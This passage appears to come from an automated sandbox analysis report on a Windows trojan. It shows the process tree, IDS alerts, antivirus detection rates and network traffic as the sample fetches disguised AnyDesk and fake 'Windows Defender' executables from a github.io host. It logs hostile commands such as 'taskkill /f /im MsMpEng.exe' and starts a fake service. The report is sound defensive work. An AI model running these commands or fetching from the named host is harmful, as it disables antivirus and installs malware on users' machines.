      • sc.exe (PID: 1780 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • Conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5156 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6928 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • Conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4020 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2136 cmdline: sc start MicrosoftWindowsDefenderCoreService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • Conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5996 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7076 cmdline: taskkill /f /im MsMpEng.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3524 cmdline: "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6796 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6796, ProcessName: svchost.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-29T02:26:01.175695+0200 | 2001046 | 3 | Misc activity | 185.199.110.153 | 443 | 192.168.2.6 | 49710 | TCP |
| 2024-09-29T02:26:01.965049+0200 | 2001046 | 3 | Misc activity | 185.199.110.153 | 443 | 192.168.2.6 | 49711 | TCP |
| 2024-09-29T02:26:02.839748+0200 | 2001046 | 3 | Misc activity | 185.199.110.153 | 443 | 192.168.2.6 | 49712 | TCP |
| 2024-09-29T02:26:10.297385+0200 | 2001046 | 3 | Misc activity | 185.199.110.153 | 443 | 192.168.2.6 | 49715 | TCP |
| 2024-09-29T02:26:11.170934+0200 | 2001046 | 3 | Misc activity | 185.199.110.153 | 443 | 192.168.2.6 | 49717 | TCP |

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-29T02:26:01.082281+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:01.872232+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:02.740638+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:09.596623+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49714 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:10.202534+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49715 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:11.082553+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49717 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:17.685412+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49721 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:24.719024+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:31.217086+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49725 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:37.673371+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49726 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:44.000738+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49728 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:50.547457+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49729 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:26:56.517807+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49731 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:02.499688+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49733 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:08.462279+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49734 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:14.453356+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49735 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:20.468666+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49736 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:26.655782+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49737 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:32.889465+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49739 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:39.281130+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49740 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:45.756534+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49741 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:52.185949+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49742 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:27:58.464364+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49743 | 185.199.110.153 | 443 | TCP |
| 2024-09-29T02:28:04.777993+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49744 | 185.199.110.153 | 443 | TCP |


AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exe | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exe | ReversingLabs: Detection: 28%
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe | ReversingLabs: Detection: 31%
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | ReversingLabs: Detection: 28%
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | ReversingLabs: Detection: 31%
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | ReversingLabs: Detection: 41%
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C78832B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6C78832B4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E1A9B94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF76E1A9B94
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Code function: 7_2_00007FF7AA9590E0 FindFirstFileExW,7_2_00007FF7AA9590E0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DDB32B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_00007FF71DDB32B4
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskCrashHandler.exe HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/MicrosoftWindowsDefenderCoreService.exe HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskUpdateService.exe HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: Joe Sandbox View | IP Address: 185.199.110.153 185.199.110.153
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49714 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49717 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49735 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49721 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49710 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49724 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49733 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49737 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49743 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49725 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49712 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49734 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49739 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49715
Source: Network traffic | Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49710
Source: Network traffic | Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49717
Source: Network traffic | Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49712
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.199.110.153:443 -> 192.168.2.6:49711
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49744 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49729 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49741 -> 185.199.110.153:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49731 -> 185.199.110.153:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C785CDF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,0_2_00007FF6C785CDF0
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskCrashHandler.exe HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/MicrosoftWindowsDefenderCoreService.exe HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskUpdateService.exe HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/AnyDeskShellIntegration.dll HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | HTTP traffic detected: GET /file/version.txt HTTP/1.1 Host: duy-thanh.github.io
Source: global traffic | DNS traffic detected: DNS query: duy-thanh.github.io
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.00000276209D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/1
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/=R
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, AnyDeskUpdateService.exe | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exe
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.execdf-ms
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exedll
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exehttps://duy-thanh.github.io/file/AnyDeskUpda
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exen
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup%l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetupz
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exey
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskCrashHandler.exez
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskS
Source: AnyDeskUpdateService.exe, 00000020.00000002.3385629324.0000009560FAC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegratL
Source: AnyDeskUpdateService.exe, 00000020.00000002.3386537801.0000009561CFD000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegratP
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, AnyDeskUpdateService.exe | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll(l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll8l
Source: MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 